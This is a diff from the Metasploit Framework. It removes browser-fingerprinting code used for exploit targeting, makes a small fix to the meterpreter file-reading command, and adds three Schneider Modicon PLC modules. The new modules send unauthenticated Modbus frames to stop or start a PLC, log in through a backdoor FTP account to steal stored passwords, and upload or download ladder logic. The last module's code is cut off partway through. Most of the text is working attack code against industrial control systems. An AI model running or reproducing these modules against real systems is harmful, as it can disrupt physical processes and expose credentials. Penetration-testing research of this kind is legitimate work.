-				ua_version = "8.0";
-				os_flavor = "XP";
-				os_sp = "SP3";
-				break;
-			case "580":
-				// IE 8.0.7100.0, Windows 7 English
-				// IE 8.0.7100.0, Windows 7 64-bit English
-			case "5816385":
-				// IE 8.0.7600.16385, Windows 7 English
-			case "5816475":
-			case "5816762":
-				// IE 8.0.7600.16385, Windows 7 English
-				ua_version = "8.0";
-				os_flavor = "7";
-				os_sp = "SP0";
-				break;
-			case "9016406":
-				// IE 9.0.7930.16406, Windows 7 64-bit
-				ua_version = "9.0";
-				os_flavor = "7";
-				os_sp = "SP0";
-				break;
-
-			//default:
-			//	document.writeln(version);
-			//	break;
-		}
-
-		if (!ua_version) {
-			// The ScriptEngine functions failed us, try some object detection
-			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
-				// IE8 detection straight from IEBlog.  Thank you Microsoft.
-				try {
-					ua_version = "8.0";
-					document.documentElement.style.display = "table-cell";
-				} catch(e) {
-					// This executes in IE7,
-					// but not IE8, regardless of mode
-					ua_version = "7.0";
-				}
-			} else if (document.compatMode) {
-				ua_version = "6.0";
-			} else if (window.createPopup) {
-				ua_version = "5.5";
-			} else if (window.attachEvent) {
-				ua_version = "5.0";
-			} else {
-				ua_version = "4.0";
-			}
-			switch (navigator.appMinorVersion){
-				case ";SP2;":
-					ua_version += ";SP2";
-					break;
-			}
-		}
-	}
-
-	if (!os_name && navigator.platform == "Win32") { os_name = "#{oses::WINDOWS}"; }
-
-	//--
-	// Flavor
-	//--
-	if (!ua_is_lying) {
-		version = useragent.toLowerCase();
-	} else if (navigator.oscpu) {
-		// Then this is Gecko and we can get at least os_name without the
-		// useragent
-		version = navigator.oscpu.toLowerCase();
-	} else {
-		// All we have left is the useragent and we know it's lying, so don't bother
-		version = " ";
-	}
-	if (!os_name || 0 == os_name.length) {
-		if (version.indexOf("windows") != -1)    { os_name = "#{oses::WINDOWS}"; }
-		else if (version.indexOf("mac") != -1)   { os_name = "#{oses::MAC_OSX}"; }
-		else if (version.indexOf("linux") != -1) { os_name = "#{oses::LINUX}";   }
-	}
-	if (os_name == "#{oses::WINDOWS}" && (!os_flavor || 0 == os_flavor.length)) {
-		if (version.indexOf("windows 95") != -1)          { os_flavor = "95";    }
-		else if (version.indexOf("windows nt 4") != -1)   { os_flavor = "NT";    }
-		else if (version.indexOf("win 9x 4.9") != -1)     { os_flavor = "ME";    }
-		else if (version.indexOf("windows 98") != -1)     { os_flavor = "98";    }
-		else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000";  }
-		else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP";    }
-		else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003";  }
-		else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
-		else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7";     }
-	}
-	if (os_name == "#{oses::LINUX}" && (!os_flavor || 0 == os_flavor.length)) {
-		if (version.indexOf("gentoo") != -1)       { os_flavor = "Gentoo";  }
-		else if (version.indexOf("ubuntu") != -1)  { os_flavor = "Ubuntu";  }
-		else if (version.indexOf("debian") != -1)  { os_flavor = "Debian";  }
-		else if (version.indexOf("rhel") != -1)    { os_flavor = "RHEL";    }
-		else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL";    }
-		else if (version.indexOf("centos") != -1)  { os_flavor = "CentOS";  }
-		else if (version.indexOf("fedora") != -1)  { os_flavor = "Fedora";  }
-		else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
-	}
-
-	//--
-	// Language
-	//--
-	if (navigator.systemLanguage) {
-		// ie
-		os_lang = navigator.systemLanguage;
-	} else if (navigator.language) {
-		// gecko derivatives, safari, opera
-		os_lang = navigator.language;
-	} else {
-		// some other browser and we don't know how to get the language, so
-		// just guess english
-		os_lang = "en";
-	}
-
-	//--
-	// Architecture
-	//--
-	if (typeof(navigator.cpuClass) != 'undefined') {
-		// Then this is IE or Opera9+ and we can grab the arch directly
-		switch (navigator.cpuClass) {
-			case "x86":
-				arch = "#{ARCH_X86}";
-				break;
-			case "x64":
-				arch = "#{ARCH_X86_64}";
-				break;
-		}
-	}
-	if (!arch || 0 == arch.length) {
-		// We don't have the handy-dandy navagator.cpuClass, so infer from
-		// platform
-		version = navigator.platform;
-		//document.write(version + "\\n");
-		// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
-		// 64-bit client on Windows 7, 64-bit:
-		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
-		// 32-bit client on Windows 7, 64-bit:
-		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
-		// 32-bit client on Vista, 32-bit, "Compatibility View":
-		//     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
-		//
-		// Report 32-bit client on 64-bit OS as being 32 because exploits will
-		// need to know the bittedness of the process, not the OS.
-		if ( ("Win32" == version) || (version.match(/i.86/)) ) {
-			arch = "#{ARCH_X86}";
-		} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64')))  {
-			arch = "#{ARCH_X86_64}";
-		} else if (-1 != version.indexOf('PPC'))  {
-			arch = "#{ARCH_PPC}";
-		}
-	}
-
-	window.detected_version = {
-		os_name:os_name,
-		os_flavor:os_flavor,
-		os_sp:os_sp,
-		os_lang:os_lang,
-		arch:arch,
-		ua_name:ua_name,
-		ua_version:ua_version
-	};
-	return window.detected_version;
-} // function getVersion
-
-function searchVersion(needle, haystack) {
-	var index = haystack.indexOf(needle);
-	var found_version;
-	if (index == -1) { return; }
-	found_version = haystack.substring(index+needle.length+1);
-	if (found_version.indexOf(' ') != -1) {
-		// Strip off any junk at the end such as a CLR declaration
-		found_version = found_version.substring(0,found_version.indexOf(' '));
-	}
-	return found_version;
-}
-
-
-/*
- * Return -1 if a < b, 0 if a == b, 1 if a > b
- */
-function ua_ver_cmp(ver_a, ver_b) {
-	// shortcut the easy case
-	if (ver_a == ver_b) {
-		return 0;
-	}
-
-	a = ver_a.split(".");
-	b = ver_b.split(".");
-	for (var i = 0; i < Math.max(a.length, b.length); i++) {
-		// 3.0 == 3
-		if (!b[i]) { b[i] = "0"; }
-		if (!a[i]) { a[i] = "0"; }
-
-		if (a[i] == b[i]) { continue; }
-
-		a_int = parseInt(a[i]);
-		b_int = parseInt(b[i]);
-		a_rest = a[i].substr(a_int.toString().length);
-		b_rest = b[i].substr(b_int.toString().length);
-		if (a_int < b_int) {
-			return -1;
-		} else if (a_int > b_int) {
-			return 1;
-		} else { // ==
-			// Then we need to deal with the stuff after the ints, e.g.:
-			// "b4pre"
-			if (a_rest == "b" && b_rest.length == 0) {
-				return -1;
-			}
-			if (b_rest == "b" && a_rest.length == 0) {
-				return 1;
-			}
-			// Just give up and try a lexicographical comparison
-			if (a_rest < b_rest) {
-				return -1;
-			} else if (a_rest > b_rest) {
-				return 1;
-			}
-		}
-	}
-	// If we get here, they must be equal
-	return 0;
-}
-
-function ua_ver_lt(a, b) {
-	if (-1 == ua_ver_cmp(a,b)) { return true; }
-	return false;
-}
-function ua_ver_gt(a, b) {
-	if (1 == ua_ver_cmp(a,b)) { return true; }
-	return false;
-}
-function ua_ver_eq(a, b) {
-	if (0 == ua_ver_cmp(a,b)) { return true; }
-	return false;
-}
-ENDJS
 		super @js

 		return @js
@@ -124,14 +124,18 @@ class Console::CommandDispatcher::Stdapi::Fs
 			return true
 		end

-		fd = client.fs.file.new(args[0], "rb")
+		if (client.fs.stat(args[0]).directory?)
+			print_error("#{args[0]} is a directory")
+		else
+			fd = client.fs.file.new(args[0], "rb")

-		until fd.eof?
-			print(fd.read)
+			until fd.eof?
+				print(fd.read)
+			end
+
+			fd.close
 		end

-		fd.close
-
 		true
 	end

@@ -0,0 +1,181 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Rex::Socket::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Schneider Modicon remote START/STOP command',
+			'Description'   => %q{
+				The Schneider Modicon with Unity series of PLCs use Modbus function
+				code 90 (0x5a) to perform administrative commands without authentication.
+				This module allows a remote user to change the state of the PLC between
+				STOP and RUN, allowing an attacker to end process control by the PLC.
+
+				This module is based on the original 'modiconstop.rb' Basecamp module from
+				DigitalBond.
+			},
+			'Author'         =>
+				[ 
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+			'Version'        => '$Revision$',
+			'DisclosureDate' => 'Apr 5 2012',
+			))
+		register_options(
+			[
+				OptEnum.new("MODE", [true, 'PLC command', "STOP",
+					[
+						"STOP",
+						"RUN"
+					]
+				]),
+				Opt::RPORT(502)
+			], self.class)
+
+	end
+	
+	# this is used for building a Modbus frame
+	# just prepends the payload with a modbus header
+	def makeframe(packetdata)
+		if packetdata.size > 255
+			print_error("packet too large, sorry")
+			print_error("Offending packet: " + packetdata)
+			return
+		end
+		payload = ""
+		payload += [@modbuscounter].pack("n")
+		payload += "\x00\x00\x00" #dunno what these are
+		payload += [packetdata.size].pack("c") # size byte
+		payload += packetdata
+	end
+	
+	# a wrapper just to be sure we increment the counter
+	def sendframe(payload)
+		sock.put(payload)
+		@modbuscounter += 1
+		r = sock.recv(65535, 0.1) # XXX: All I care is that we wait for a packet to come in, but I'd like to minimize the wait time and also minimize OS buffer use.  What to do?
+		return r
+	end
+
+	# This function sends some initialization requests
+	# I have no idea what these do, but they seem to be
+	# needed to get the Modicon chatty with us.
+	# I would make some analogy to 'gaming' in the
+	# bar-dating scene, but I'll refrain.
+	def init
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x01\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x0a\x00" + 'T' * 0xf9
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x03\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x03\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x01\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x0a\x00"
+		(0..0xf9).each { |x| payload += [x].pack("c") }
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x64\x00\x00\x00\x9c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x64\x00\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x5a\x01\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x5a\x02\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x46\x03\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x3c\x04\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x32\x05\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x28\x06\x00\x00\x0c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x64\x00\x00\x00\x9c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x10\x43\x4c\x00\x00\x0f"
+		payload += "USER-714E74F21B" # Yep, really
+		#payload += "META-SPLOITMETA"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x50\x15\x00\x01\x0b"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x50\x15\x00\x01\x07"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x12"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x12"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x01\x00\x00\x00\x00\xff\xff\x00\x70"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x07\x01\x80\x00\x00\x00\x00\xfb\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x07\x01\x80\x00\x00\x00\x00\xfb\x00"
+		sendframe(makeframe(payload))
+	end
+
+	def stop
+		payload = "\x00\x5a\x01\x41\xff\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+	end
+
+	def start
+		payload = "\x00\x5a\x01\x40\xff\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+	end
+
+	def cleanup
+	end
+
+	def run
+		@modbuscounter = 0x0000 # used for modbus frames
+		connect
+		init
+		case datastore['MODE']
+		when "STOP"
+			stop
+		when "RUN"
+			start
+		else
+			print_error("Invalid MODE")
+			return
+		end
+	end
+end
@@ -0,0 +1,224 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'net/ftp' # TODO: Update this with a proper FTP server implementation
+
+class Metasploit3 < Msf::Auxiliary
+	include Msf::Exploit::Remote::Ftp
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Schneider Modicon Quantum Password Recovery',
+			'Description'    => %q{
+				The Schneider Modicon Quantum series of Ethernet cards store usernames and
+				passwords for the system in files that may be retrieved via backdoor access.
+
+				This module is based on the original 'modiconpass.rb' Basecamp module from
+				DigitalBond.
+			},
+			'Author'         =>
+				[
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+			'Version'	=> '$Revision$',
+			'DisclosureDate'=> 'Jan 19 2012',
+			))
+
+		register_options(
+			[
+				Opt::RPORT(21),
+				OptString.new('FTPUSER', [true, "The backdoor account to use for login", 'ftpuser']),
+				OptString.new('FTPPASS', [true, "The backdoor password to use for login", 'password']),
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new('RUN_CHECK', [false, "Check if the device is really a Modicon device", true])
+			], self.class)
+
+	end
+
+	# FIXME: This is required since there's no Rex Socket yet (will be
+	# part of a full FTP client implementation)
+	def ip
+		Rex::Socket.resolv_to_dotted(datastore['RHOST'])
+	end
+
+	def check_banner
+		banner == "220 FTP server ready.\r\n"
+	end
+
+	# TODO: If the username and password is correct, but this /isn't/ a Modicon
+	# device, then we're going to end up storing HTTP credentials that are not
+	# correct. If there's a way to fingerprint the device, it should be done here.
+	def check
+		return true unless datastore['RUN_CHECK']
+		is_modicon = false
+		vprint_status "#{ip}:#{rport} - FTP - Checking fingerprint"
+		connect rescue nil
+		if sock
+			# It's a weak fingerprint, but it's something
+			is_modicon = check_banner()
+			disconnect
+		else
+			print_error "#{ip}:#{rport} - FTP - Cannot connect, skipping"
+			return false
+		end
+		if is_modicon
+			print_status "#{ip}:#{rport} - FTP - Matches Modicon fingerprint"
+		else
+			print_error "#{ip}:#{rport} - FTP - Skipping due to fingerprint mismatch"
+		end
+		return is_modicon
+	end
+
+	def run
+		if check()
+			if setup_ftp_connection()
+				grab()
+			end
+		end
+	end
+
+	def setup_ftp_connection
+		vprint_status "#{ip}:#{rport} - FTP - Connecting"
+		if connect_login()
+			print_status("#{ip}:#{rport} - FTP - Login succeeded")
+			report_auth_info( 
+				:host => ip,
+				:port => rport,
+				:proto => 'tcp',
+				:user => user,
+				:pass => pass,
+				:ptype => 'password_ro',
+				:active => true
+			)
+			return true
+		else
+			print_status("#{ip}:#{rport} - FTP - Login failed")
+			return false
+		end
+	end
+
+	def cleanup
+		disconnect rescue nil
+		data_disconnect rescue nil
+	end
+
+	# Echo the Net::FTP implementation
+	def ftp_gettextfile(fname)
+		vprint_status("#{ip}:#{rport} - FTP - Opening PASV data socket to download #{fname.inspect}")
+		data_connect("A")
+		res = send_cmd_data(["GET", fname.to_s], nil, "A")
+	end
+
+	def grab
+		logins = Rex::Ui::Text::Table.new(
+			'Header'	=>	"Schneider Modicon Quantum services, usernames, and passwords",
+			'Indent'	=>	1,
+			'Columns'	=>	["Service", "User Name", "Password"]
+		)
+		httpcreds = ftp_gettextfile('/FLASH0/userlist.dat')
+		if httpcreds
+			print_status "#{ip}:#{rport} - FTP - HTTP password retrieval: success"
+		else
+			print_status "#{ip}:#{rport} - FTP - HTTP default password presumed"
+		end
+		ftpcreds = ftp_gettextfile('/FLASH0/ftp/ftp.ini')
+		if ftpcreds
+			print_status "#{ip}:#{rport} - FTP - password retrieval: success"
+		else
+			print_error "#{ip}:#{rport} - FTP - password retrieval error"
+		end
+		writecreds = ftp_gettextfile('/FLASH0/rdt/password.rde')
+		if writecreds
+			print_status "#{ip}:#{rport} - FTP - Write password retrieval: success"
+		else
+			print_error "#{ip}:#{rport} - FTP - Write password error"
+		end
+		if httpcreds
+			httpuser = httpcreds[1].split(/[\r\n]+/)[0]
+			httppass = httpcreds[1].split(/[\r\n]+/)[1]
+		else
+			# Usual defaults
+			httpuser = "USER"
+			httppass = "USER"
+		end
+		print_status("#{rhost}:#{rport} - FTP - Storing HTTP credentials")
+		logins << ["http", httpuser, httppass]
+		report_auth_info(
+			:host	=> ip,
+			:port	=> 80,
+			:sname	=> "http",
+			:user	=> httpuser,
+			:pass	=> httppass,
+			:active	=> true
+		)
+		logins << ["scada-write", "", writecreds[1]]
+		if writecreds # This is like an enable password, used after HTTP authentication.
+			report_note(
+				:host => ip,
+				:port => 80,
+				:proto => 'tcp',
+				:sname => 'http',
+				:ntype => 'scada.modicon.write-password',
+				:data => writecreds[1]
+			)
+		end
+
+		if ftpcreds
+			#  TODO:
+			#  Can we add a nicer dictionary?  Revershing the hash
+			#  using Metasploit's existing loginDefaultencrypt dictionary yields
+			#  plaintexts that contain non-ascii characters for some hashes.
+			#  check out entries starting at 10001 in /msf3/data/wordlists/vxworks_collide_20.txt 
+			#  for examples.  A complete ascii rainbow table for loginDefaultEncrypt is ~2.6mb,
+			#  and it can be done in just a few lines of ruby.  
+			#  See https://github.com/cvonkleist/vxworks_hash
+			modicon_ftpuser = ftpcreds[1].split(/[\r\n]+/)[0]
+			modicon_ftppass = ftpcreds[1].split(/[\r\n]+/)[1]
+		else
+			modicon_ftpuser = "USER"
+			modicon_ftppass = "USERUSER" #from the manual.  Verified.
+		end
+		print_status("#{rhost}:#{rport} - FTP - Storing hashed FTP credentials")
+		# The collected hash is not directly reusable, so it shouldn't be an
+		# auth credential in the Cred sense. TheLightCosine should fix some day.
+		# Can be used for telnet as well if telnet is enabled.
+			report_note(
+				:host => ip,
+				:port => 21,
+				:proto => 'tcp',
+				:sname => 'ftp',
+				:ntype => 'scada.modicon.ftp-password',
+				:data => "User:#{modicon_ftpuser} VXWorks_Password:#{modicon_ftppass}"
+			)
+			logins << ["VxWorks", modicon_ftpuser, modicon_ftppass]
+
+		# Not this:
+		# report_auth_info(
+		#	:host	=> ip,
+		#	:port	=> rport,
+		#	:proto => 'tcp',
+		#	:sname => 'ftp',
+		#	:user	=> modicon_ftpuser,
+		#	:pass	=> modicon_ftppass,
+		#	:type => 'password_vx', # It's a hash, not directly usable, but crackable
+		#	:active	=> true
+		# )
+		print_line logins.to_s
+	end
+
+end
@@ -0,0 +1,307 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Rex::Socket::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Schneider Modicon Ladder Logic Upload/Download',
+			'Description'    => %q{
+				The Schneider Modicon with Unity series of PLCs use Modbus function
+				code 90 (0x5a) to send and receive ladder logic.  The protocol is
+				unauthenticated, and allows a rogue host to retrieve the existing
+				logic and to upload new logic.
+
+				Two modes are supported: "SEND" and "RECV," which behave as one might
+				expect -- use 'set mode ACTIONAME' to use either mode of operation.
+
+				In either mode, FILENAME must be set to a valid path to an existing 
+				file (for SENDing) or a new file (for RECVing), and the directory must
+				already exist.  The default, 'modicon_ladder.apx' is a blank
+				ladder logic file which can be used for testing.
+
+				This module is based on the original 'modiconstux.rb' Basecamp module from
+				DigitalBond.
+			},
+			'Author'         =>
+				[
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+			'Version'        => '$Revision$',
+			'DisclosureDate' => 'Apr 5 2012',
+			))
+
+		register_options(
+			[
+				OptString.new('FILENAME',
+					[
+						true,
+						"The file to send or receive", 
+						File.join(Msf::Config.data_directory, "exploits", "modicon_ladder.apx")
+					]),
+				OptEnum.new("MODE", [true, 'File transfer operation', "SEND",
+					[
+						"SEND",
+						"RECV"
+					]
+				]),
+				Opt::RPORT(502)
+			], self.class)
+
+	end
+
+	def run
+		unless valid_filename?
+			print_error "FILENAME invalid: #{datastore['FILENAME'].inspect}"
+			return nil
+		end
+		@modbuscounter = 0x0000 # used for modbus frames
+		connect
+		init
+		case datastore['MODE']
+		when "SEND"
+			writefile
+		when "RECV"
+			readfile
+		end
+	end
+
+	def valid_filename?
+		if datastore['MODE'] == "SEND"
+			File.readable? datastore['FILENAME']
+		else
+			File.writable?(File.split(datastore['FILENAME'])[0].to_s)
+		end
+	end
+
+	# this is used for building a Modbus frame
+	# just prepends the payload with a modbus header
+	def makeframe(packetdata)
+		if packetdata.size > 255
+			print_error("#{rhost}:#{rport} - MODBUS - Packet too large: #{packetdata.inspect}")
+			return
+		end
+		payload = ""
+		payload += [@modbuscounter].pack("n")
+		payload += "\x00\x00\x00" #dunno what these are
+		payload += [packetdata.size].pack("c") # size byte
+		payload += packetdata
+	end
+
+	# a wrapper just to be sure we increment the counter
+	def sendframe(payload)
+		sock.put(payload)
+		@modbuscounter += 1
+		# TODO: Fix with sock.timed_read -- Should make it faster, just need a test.
+		r = sock.recv(65535, 0.1) 
+		return r
+	end
+
+	# This function sends some initialization requests
+	# required for priming the Quantum
+	def init
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x01\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x0a\x00" + 'T' * 0xf9
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x03\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x03\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x01\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x0a\x00"
+		(0..0xf9).each { |x| payload += [x].pack("c") }
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x64\x00\x00\x00\x9c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x64\x00\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x5a\x01\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x5a\x02\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x46\x03\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x3c\x04\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x32\x05\x00\x00\xf6\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x14\x00\x28\x06\x00\x00\x0c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x00\x00\x00\x00\x64\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x20\x00\x13\x00\x64\x00\x00\x00\x9c\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x10\x43\x4c\x00\x00\x0f"
+		payload += "USER-714E74F21B" # Yep, really
+		#payload += "META-SPLOITMETA"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x50\x15\x00\x01\x0b"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x50\x15\x00\x01\x07"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x12"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x12"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x01\x00\x00\x00\x00\xff\xff\x00\x70"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x07\x01\x80\x00\x00\x00\x00\xfb\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x07\x01\x80\x00\x00\x00\x00\xfb\x00"
+		sendframe(makeframe(payload))
+	end
+
+	# Write the contents of local file filename to the target's filenumber
+	# blank logic files will be available on the Digital Bond website
+	def writefile
+		print_status "#{rhost}:#{rport} - MODBUS - Sending write request"
+		blocksize = 244	# bytes per block in file transfer
+		buf = File.open(datastore['FILENAME'], 'rb') { |io| io.read }
+		fullblocks = buf.length / blocksize
+		if fullblocks > 255
+			print_error("#{rhost}:#{rport} - MODBUS - File too large, aborting.")
+			return
+		end
+		lastblocksize = buf.length - (blocksize*fullblocks) 
+		fileblocks = fullblocks
+		if lastblocksize != 0
+			fileblocks += 1
+		end
+		filetype = buf[0..2]
+		if filetype == "APX"
+			filenum = "\x01"
+		elsif filetype == "APB"
+			filenum = "\x10"
+		end
+		payload = "\x00\x5a\x00\x03\x01"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x58\x02\x01\x00\x00\x00\x00\x00\xfb\x00"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x00\x02"
+		sendframe(makeframe(payload))
+		payload = "\x00\x5a\x01\x30\x00"
+		payload += filenum
+		response = sendframe(makeframe(payload))
+		if response[8..9] == "\x01\xfe"
+			print_status("#{rhost}:#{rport} - MODBUS - Write request success!  Writing file...")
+		else
+			print_error("#{rhost}:#{rport} - MODBUS - Write request error.  Aborting.")
+			return
+		end
+		payload = "\x00\x5a\x01\x04"
+		sendframe(makeframe(payload))
+		block = 1
+		block2status = 0 # block 2 must always be sent twice
+		while block <= fullblocks
+			payload = "\x00\x5a\x01\x31\x00"
+			payload += filenum
+			payload += [block].pack("c")
+			payload += "\x00\xf4\x00"
+			payload += buf[((block - 1) * 244)..((block * 244) - 1)]
+			res = sendframe(makeframe(payload))
+			vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{payload.inspect}"
+			if res[8..9] != "\x01\xfe"
+				print_error("#{rhost}:#{rport} - MODBUS - Failure writing block #{block}")
+				return
+			end
+			# redo this iteration of the loop if we're on block 2
+			if block2status == 0 and block == 2
+				print_status("#{rhost}:#{rport} - MODBUS - Sending block 2 a second time")
+				block2status = 1
+				redo
+			end
+			block += 1
+		end
+		if lastblocksize > 0
+			payload = "\x00\x5a\x01\x31\x00"
+			payload += filenum
+			payload += [block].pack("c")
